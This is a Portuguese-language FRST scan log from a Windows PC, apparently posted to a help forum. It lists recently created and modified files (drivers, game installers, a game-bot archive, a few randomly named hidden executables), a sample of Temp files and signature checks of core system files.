2017-05-05 16:36 - 2016-11-14 06:45 - 00615992 _____ (NVIDIA Corporation) C:\Windows\system32\nvStreaming.exe
2017-05-05 16:34 - 2016-11-14 09:35 - 24208440 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglv32.dll
2017-05-05 16:34 - 2016-11-14 09:35 - 15301056 _____ (NVIDIA Corporation) C:\Windows\system32\nvcompiler.dll
2017-05-05 16:34 - 2016-11-14 09:35 - 14497712 _____ (NVIDIA Corporation) C:\Windows\system32\nvd3dum.dll
2017-05-05 16:34 - 2016-11-14 09:35 - 11270656 _____ (NVIDIA Corporation) C:\Windows\system32\nvopencl.dll
2017-05-05 16:34 - 2016-11-14 09:35 - 11208312 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll
2017-05-05 16:34 - 2016-11-14 09:35 - 10711488 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvlddmkm.sys
2017-05-05 16:34 - 2016-11-14 09:35 - 03995192 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll
2017-05-05 16:34 - 2016-11-14 09:35 - 01060216 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispco3234201.dll
2017-05-05 16:34 - 2016-11-14 09:35 - 00913856 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR.dll
2017-05-05 16:34 - 2016-11-14 09:35 - 00912248 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispgenco3234201.dll
2017-05-05 16:34 - 2016-11-14 09:35 - 00876480 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC.dll
2017-05-05 16:34 - 2016-11-14 09:35 - 00104512 _____ (NVIDIA Corporation) C:\Windows\system32\nvaudcap32v.dll
2017-05-05 16:34 - 2016-11-14 09:35 - 00050744 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvvad32v.sys
2017-05-05 16:33 - 2017-05-05 16:33 - 00000000 ____D C:\NVIDIA
2017-05-05 16:31 - 2017-05-05 16:32 - 250574008 _____ (NVIDIA Corporation) C:\Users\gabri_000\Downloads\342.01-desktop-win10-32bit-international.exe
2017-05-05 16:19 - 2017-05-22 17:35 - 00000000 ____D C:\Users\Todos os Usuários\NVIDIA
2017-05-05 16:19 - 2017-05-22 17:35 - 00000000 ____D C:\ProgramData\NVIDIA
2017-05-05 16:19 - 2016-11-14 09:35 - 00067520 _____ (Khronos Group) C:\Windows\system32\OpenCL.dll
2017-05-05 16:19 - 2016-11-14 08:00 - 04395456 _____ (NVIDIA Corporation) C:\Windows\system32\nvcpl.dll
2017-05-05 16:19 - 2016-11-14 08:00 - 03069496 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvc.dll
2017-05-05 16:19 - 2016-11-14 08:00 - 02563128 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvcr.dll
2017-05-05 16:19 - 2016-11-14 08:00 - 00677312 _____ (NVIDIA Corporation) C:\Windows\system32\nvvsvc.exe
2017-05-05 16:19 - 2016-11-14 08:00 - 00381888 _____ (NVIDIA Corporation) C:\Windows\system32\nvmctray.dll
2017-05-05 16:19 - 2016-11-14 08:00 - 00070200 _____ (NVIDIA Corporation) C:\Windows\system32\nvshext.dll
2017-05-05 16:19 - 2016-11-11 16:51 - 07513855 _____ C:\Windows\system32\nvcoproc.bin
2017-05-05 16:05 - 2017-05-05 16:05 - 00095808 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge.dll
2017-05-05 16:05 - 2017-05-05 16:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2017-05-05 16:05 - 2017-05-05 16:05 - 00000000 ____D C:\Program Files\Common Files\Java
2017-05-05 16:04 - 2017-05-05 16:04 - 00738368 _____ (Oracle Corporation) C:\Users\gabri_000\Downloads\chromeinstall-8u131.exe
2017-05-05 15:58 - 2017-05-05 15:58 - 00000000 ____D C:\Windows\IObit
2017-05-05 15:58 - 2017-05-05 15:58 - 00000000 ____D C:\Users\Todos os Usuários\ProductData
2017-05-05 15:58 - 2017-05-05 15:58 - 00000000 ____D C:\ProgramData\ProductData
2017-05-05 15:57 - 2017-05-05 15:58 - 00000000 ____D C:\Users\gabri_000\AppData\LocalLow\IObit
2017-05-05 15:57 - 2017-05-05 15:57 - 15721672 _____ (IObit ) C:\Users\gabri_000\Downloads\driver_booster_setup.exe
2017-05-05 15:57 - 2017-05-05 15:57 - 00023840 _____ (REALiX(tm)) C:\Windows\system32\Drivers\HWiNFO32.SYS
2017-05-05 15:57 - 2017-05-05 15:57 - 00000000 ____D C:\Users\Todos os Usuários\IObit
2017-05-05 15:57 - 2017-05-05 15:57 - 00000000 ____D C:\Users\gabri_000\AppData\Roaming\IObit
2017-05-05 15:57 - 2017-05-05 15:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Driver Booster 4
2017-05-05 15:57 - 2017-05-05 15:57 - 00000000 ____D C:\ProgramData\IObit
2017-05-05 15:57 - 2017-05-05 15:57 - 00000000 ____D C:\Program Files\IObit
2017-05-05 15:53 - 2017-05-05 15:53 - 80175936 _____ (NVIDIA Corporation) C:\Users\gabri_000\Downloads\GeForce_Experience_v3.5.0.76 (1).exe
2017-05-05 15:47 - 2017-05-05 15:48 - 80175936 _____ (NVIDIA Corporation) C:\Users\gabri_000\Downloads\GeForce_Experience_v3.5.0.76.exe
2017-05-05 15:46 - 2017-05-05 15:46 - 00000000 ____D C:\Users\gabri_000\AppData\Local\NVIDIA
2017-05-05 15:25 - 2017-05-05 16:39 - 00000000 ____D C:\Users\Todos os Usuários\NVIDIA Corporation
2017-05-05 15:25 - 2017-05-05 16:39 - 00000000 ____D C:\ProgramData\NVIDIA Corporation
2017-05-05 15:25 - 2017-05-05 16:37 - 00000000 ____D C:\Program Files\NVIDIA Corporation
2017-05-04 20:10 - 2017-05-04 20:10 - 02486529 _____ C:\Users\CPD-2\Downloads\Problemas-de-Coluna-Vertebral-e-Varizes-em-dentistas.pptx
2017-05-04 20:01 - 2017-05-04 20:01 - 79383266 __RSH C:\Users\CPD-2\Desktop\ee5RzLtnhb.exe
2017-05-04 18:58 - 2017-05-04 18:58 - 00074317 _____ C:\Users\CPD-2\Downloads\Inscrição.pdf
2017-05-03 18:42 - 2017-05-03 18:42 - 00000933 _____ C:\Users\Public\Desktop\Tibia.lnk
2017-05-03 18:42 - 2017-05-03 18:42 - 00000000 ____D C:\Users\gabri_000\Downloads\ibotplus v10_30_1
2017-05-03 18:41 - 2017-05-03 18:42 - 42171907 _____ (CipSoft GmbH ) C:\Users\gabri_000\Downloads\outdated_tibia1000.exe
2017-05-03 18:39 - 2017-05-03 18:40 - 12043495 _____ C:\Users\gabri_000\Downloads\ibotplus v10_30_1.zip
2017-05-03 15:24 - 2017-05-03 15:24 - 00000942 _____ C:\Users\Public\Desktop\Heroes of the Storm.lnk
2017-05-03 14:38 - 2017-05-03 14:38 - 00000000 ____D C:\Users\gabri_000\AppData\Local\Steam
2017-05-03 14:31 - 2017-05-24 16:09 - 00000000 ____D C:\Program Files\Heroes of the Storm
2017-05-03 14:30 - 2017-05-24 17:00 - 00000000 ____D C:\Users\gabri_000\AppData\Local\Battle.net
2017-05-03 14:30 - 2017-05-24 14:09 - 00000000 ____D C:\Program Files\Blizzard App
2017-05-03 14:30 - 2017-05-03 14:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Blizzard App
2017-05-03 14:27 - 2017-05-03 14:31 - 00000000 ____D C:\Users\gabri_000\AppData\Roaming\Battle.net
2017-05-03 14:26 - 2017-05-03 14:27 - 03358192 _____ (Blizzard Entertainment) C:\Users\gabri_000\Downloads\Heroes-of-the-Storm-Setup (1).exe
2017-05-02 13:00 - 2017-05-02 13:00 - 35396944 _____ (Microsoft Corporation ) C:\Users\gabri_000\Downloads\VSCodeSetup-1.11.2.exe
2017-05-02 12:56 - 2017-05-02 12:56 - 11456512 _____ C:\Users\gabri_000\Downloads\node-v6.10.2-x86.msi
2017-05-02 12:48 - 2017-05-02 12:48 - 00000000 ____D C:\Users\gabri_000\.android
2017-05-02 12:47 - 2017-05-12 16:24 - 00000000 ____D C:\Users\gabri_000\.TianTianVM
2017-05-02 12:45 - 2017-05-02 12:45 - 00000000 ____D C:\Users\gabri_000\AppData\Roaming\Adobe
2017-04-29 09:05 - 2017-04-29 12:06 - 00000000 ____D C:\Users\Ana Luisa\AppData\Roaming\WhatsApp
2017-04-29 09:05 - 2017-04-29 11:22 - 00000000 ____D C:\Users\Ana Luisa\AppData\Local\WhatsApp
2017-04-29 09:05 - 2017-04-29 11:22 - 00000000 ____D C:\Users\Ana Luisa\AppData\Local\SquirrelTemp
2017-04-29 09:05 - 2017-04-29 09:05 - 00002233 _____ C:\Users\Ana Luisa\Desktop\WhatsApp.lnk
2017-04-29 09:05 - 2017-04-29 09:05 - 00000000 ____D C:\Users\Ana Luisa\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WhatsApp
2017-04-29 09:04 - 2017-04-29 09:04 - 80824080 _____ (WhatsApp) C:\Users\Ana Luisa\Downloads\WhatsAppSetup.exe
2017-04-29 08:22 - 2017-04-29 08:23 - 02217067 _____ C:\Users\Ana Luisa\Downloads\CIRCUITOS_ELETRICOS_I_SLIDES_1°_BIMESTRE_AULA_2__LEITURA.PDF
2017-04-29 08:22 - 2017-04-29 08:22 - 00038857 _____ C:\Users\Ana Luisa\Downloads\CIRCUITOS_ELETRICOS_I_LISTA_1°_BIMESTRE_COMPLEMENTAR.PDF
2017-04-28 16:47 - 2017-04-28 16:47 - 00001471 _____ C:\Users\gabri_000\Desktop\KOPLAYER Multi Manager.lnk
2017-04-28 16:47 - 2017-04-28 16:47 - 00000607 _____ C:\Users\gabri_000\Desktop\KOPLAYER.lnk
2017-04-28 16:47 - 2017-04-28 16:47 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KOPLAYER
2017-04-28 16:46 - 2017-05-12 18:53 - 00000000 ____D C:\Users\gabri_000\AppData\Local\KOPLAYERData
2017-04-28 16:46 - 2017-05-02 12:48 - 00000000 ____D C:\KOPLAYER
2017-04-28 16:41 - 2017-04-28 16:46 - 316167536 _____ ( ) C:\Users\gabri_000\Downloads\koplayer-1-4-1049.exe
2017-04-28 07:40 - 2017-04-28 07:40 - 01697280 _____ C:\Users\CPD-2\Downloads\SAUDE_PUBLICA_ASPECTOS_CONCEITUAIS.PPT
2017-04-27 15:22 - 2017-04-27 15:22 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Heroes of the Storm
2017-04-27 15:15 - 2017-05-24 16:09 - 00000000 ____D C:\Users\gabri_000\Documents\Heroes of the Storm
2017-04-27 15:15 - 2017-04-27 15:23 - 00000000 ____D C:\Users\Todos os Usuários\Blizzard Entertainment
2017-04-27 15:15 - 2017-04-27 15:23 - 00000000 ____D C:\ProgramData\Blizzard Entertainment
2017-04-27 15:14 - 2017-04-27 15:14 - 00000000 ____D C:\Users\gabri_000\AppData\Local\CEF
2017-04-27 15:14 - 2017-04-27 15:14 - 00000000 ____D C:\Users\gabri_000\AppData\Local\Blizzard Entertainment
2017-04-27 15:12 - 2017-04-27 15:12 - 00000000 ____D C:\Users\Todos os Usuários\Battle.net
2017-04-27 15:12 - 2017-04-27 15:12 - 00000000 ____D C:\ProgramData\Battle.net
2017-04-27 15:10 - 2017-04-27 15:10 - 03358192 _____ (Blizzard Entertainment) C:\Users\gabri_000\Downloads\Heroes-of-the-Storm-Setup.exe
2017-04-25 19:48 - 2017-04-25 19:48 - 00002756 _____ C:\Users\CPD-2\Downloads\5224941586959012.zip

==================== Um Mês Modificados arquivos e pastas ========

(Se uma entrada for incluída na fixlist, o arquivo/pasta será movido.)

2017-05-24 17:06 - 2013-08-22 05:05 - 00000000 ____D C:\Windows\CbsTemp
2017-05-24 17:01 - 2016-03-23 13:51 - 00000000 ____D C:\Users\Todos os Usuários\Package Cache
2017-05-24 17:01 - 2016-03-23 13:51 - 00000000 ____D C:\ProgramData\Package Cache
2017-05-24 16:50 - 2016-01-20 10:31 - 00001072 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2017-05-24 16:48 - 2016-07-05 14:06 - 00000000 ____D C:\Program Files\Steam
2017-05-24 13:01 - 2016-06-07 13:44 - 00000000 ____D C:\Users\Todos os Usuários\GbPlugin
2017-05-24 13:01 - 2016-06-07 13:44 - 00000000 ____D C:\ProgramData\GbPlugin
2017-05-24 12:57 - 2016-07-05 14:06 - 00000000 ____D C:\Program Files\Common Files\Steam
2017-05-24 02:15 - 2017-02-16 07:06 - 00000000 ___RD C:\Users\gabri_000\SkyDrive
2017-05-23 18:57 - 2015-07-19 00:49 - 00000000 ____D C:\Users\CPD-2\AppData\Local\VirtualStore
2017-05-23 07:41 - 2016-06-07 13:44 - 00000000 ____D C:\Program Files\GbPlugin
2017-05-22 21:47 - 2017-02-20 20:04 - 00000000 ____D C:\Users\CPD-2\Desktop\Isabela
2017-05-22 18:54 - 2016-06-07 13:45 - 00025848 _____ (GAS Tecnologia) C:\Windows\system32\Drivers\gbpddreg32.sys
2017-05-22 17:38 - 2015-07-19 00:52 - 00004354 _____ C:\Windows\system32\PerfStringBackup.INI
2017-05-22 17:38 - 2013-08-22 11:12 - 01275178 _____ C:\Windows\system32\prfh0416.dat
2017-05-22 17:38 - 2013-08-22 11:12 - 00663140 _____ C:\Windows\system32\prfc0416.dat
2017-05-22 17:37 - 2013-08-22 03:21 - 00000000 ____D C:\Windows\inf
2017-05-22 17:35 - 2017-01-04 07:40 - 00022744 _____ (GAS Tecnologia) C:\Windows\system32\Drivers\wsddfac.sys
2017-05-22 17:35 - 2013-08-22 04:23 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-05-22 17:23 - 2013-08-22 03:13 - 00262144 ___SH C:\Windows\system32\config\BBI
2017-05-18 07:21 - 2015-07-19 00:49 - 00000000 ____D C:\Users\CPD-2
2017-05-16 08:09 - 2016-01-20 10:31 - 00002159 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-05-15 12:32 - 2017-02-17 07:27 - 00209920 ___SH C:\Users\gabri_000\Downloads\Thumbs.db
2017-05-11 15:20 - 2017-02-16 07:03 - 00000000 ____D C:\Users\gabri_000
2017-05-11 12:39 - 2017-03-20 08:52 - 00000000 ____D C:\Users\gabri_000\Documents\Nova pasta
2017-05-09 19:35 - 2017-04-12 17:21 - 00000000 ____D C:\Users\CPD-2\AppData\Local\Tibia
2017-05-05 16:25 - 2016-01-20 11:13 - 00000000 ____D C:\Windows\system32\MRT
2017-05-05 16:23 - 2016-01-20 11:12 - 145733648 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2017-05-05 16:19 - 2013-08-22 05:17 - 00000000 ____D C:\Windows\Help
2017-05-05 16:05 - 2016-11-30 11:11 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java Development Kit
2017-05-05 16:05 - 2016-11-30 11:10 - 00000000 ____D C:\Program Files\Java
2017-05-03 18:44 - 2017-03-21 14:37 - 00000000 ____D C:\Program Files\Common Files\BattlEye
2017-05-03 18:42 - 2017-03-07 07:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tibia
2017-05-03 18:42 - 2017-03-07 07:56 - 00000000 ____D C:\Program Files\Tibia
2017-04-29 08:24 - 2017-02-23 16:34 - 00000000 ____D C:\Users\Ana Luisa\AppData\Roaming\Skype
2017-04-29 08:20 - 2016-09-01 16:12 - 00326144 ___SH C:\Users\Ana Luisa\Desktop\Thumbs.db
2017-04-28 16:48 - 2013-08-22 05:17 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2017-04-26 12:39 - 2016-11-30 11:14 - 00000000 ____D C:\Users\Todos os Usuários\Oracle
2017-04-26 12:39 - 2016-11-30 11:14 - 00000000 ____D C:\ProgramData\Oracle
2017-04-26 12:37 - 2017-03-07 08:40 - 00000000 ____D C:\Users\gabri_000\AppData\Local\Tibia
2017-04-25 19:13 - 2016-01-20 15:02 - 01248768 ___SH C:\Users\CPD-2\Downloads\Thumbs.db
2017-04-25 19:06 - 2016-01-25 15:23 - 03933696 ___SH C:\Users\CPD-2\Desktop\Thumbs.db
2017-04-24 07:51 - 2013-08-22 05:17 - 00000000 ____D C:\Windows\AppReadiness

==================== Arquivos na raiz de alguns diretórios =======

2017-05-12 17:43 - 2017-05-12 17:44 - 81596770 __RSH () C:\Users\gabri_000\AppData\Roaming\eeKgEa82wq.exe

Alguns arquivos em TEMP:
====================
2016-09-09 13:06 - 2008-01-01 21:53 - 0061749 _____ () C:\Users\Ana Luisa\AppData\Local\Temp\grubinst.exe
2016-09-09 13:06 - 2008-01-01 21:53 - 0061496 _____ () C:\Users\Ana Luisa\AppData\Local\Temp\grubinst_gui.exe
2016-05-01 12:15 - 2013-08-22 00:05 - 0808960 _____ (Microsoft Corporation) C:\Users\CPD-2\AppData\Local\Temp\cdo1300266320.dll
2016-04-27 21:34 - 2013-08-22 00:05 - 0808960 _____ (Microsoft Corporation) C:\Users\CPD-2\AppData\Local\Temp\cdo1328123370.dll
2016-05-05 21:33 - 2013-08-22 00:05 - 0808960 _____ (Microsoft Corporation) C:\Users\CPD-2\AppData\Local\Temp\cdo1616648045.dll
2016-04-30 13:11 - 2013-08-22 00:05 - 0808960 _____ (Microsoft Corporation) C:\Users\CPD-2\AppData\Local\Temp\cdo2101394346.dll
2016-04-30 16:14 - 2013-08-22 00:05 - 0808960 _____ (Microsoft Corporation) C:\Users\CPD-2\AppData\Local\Temp\cdo3157208673.dll
2016-04-27 21:33 - 2013-08-22 00:05 - 0808960 _____ (Microsoft Corporation) C:\Users\CPD-2\AppData\Local\Temp\cdo3362691435.dll
2016-04-27 21:34 - 2013-08-22 00:05 - 0808960 _____ (Microsoft Corporation) C:\Users\CPD-2\AppData\Local\Temp\cdo847805030.dll
2015-09-22 14:06 - 2015-09-22 14:06 - 2382216 _____ (Mooii) C:\Users\CPD-2\AppData\Local\Temp\GoogleSetup.exe
2016-06-16 17:14 - 2016-03-05 08:01 - 6754928 _____ (Spotify Ltd) C:\Users\CPD-2\AppData\Local\Temp\SpotifyUninstall.exe
2017-04-26 12:38 - 2017-04-26 12:38 - 0739904 _____ (Oracle Corporation) C:\Users\gabri_000\AppData\Local\Temp\jre-8u131-windows-au.exe
2017-05-05 16:19 - 2014-07-02 14:39 - 1214048 _____ (NVIDIA Corporation) C:\Users\gabri_000\AppData\Local\Temp\nvSCPAPI.dll
2017-05-05 16:16 - 2014-07-02 14:39 - 0827680 _____ (NVIDIA Corporation) C:\Users\gabri_000\AppData\Local\Temp\nvStInst.exe
2017-03-07 08:40 - 2017-03-07 08:40 - 5326328 _____ () C:\Users\gabri_000\AppData\Local\Temp\Tibia_Setup_2791-c52d-0e8e-52c4.exe

==================== Bamital & volsnap ======================

(Não há correção automática para arquivos que não passaram na verificação.)

C:\Windows\explorer.exe => O arquivo é assinado digitalmente
C:\Windows\system32\winlogon.exe => O arquivo é assinado digitalmente
C:\Windows\system32\wininit.exe => O arquivo é assinado digitalmente
C:\Windows\system32\svchost.exe => O arquivo é assinado digitalmente
C:\Windows\system32\services.exe => O arquivo é assinado digitalmente
C:\Windows\system32\User32.dll => O arquivo é assinado digitalmente
C:\Windows\system32\userinit.exe => O arquivo é assinado digitalmente
C:\Windows\system32\rpcss.dll => O arquivo é assinado digitalmente
C:\Windows\system32\dnsapi.dll => O arquivo é assinado digitalmente
C:\Windows\system32\Drivers\volsnap.sys => O arquivo é assinado digitalmente

LastRegBack: 2017-05-23 08:05

==================== Fim de FRST.txt ============================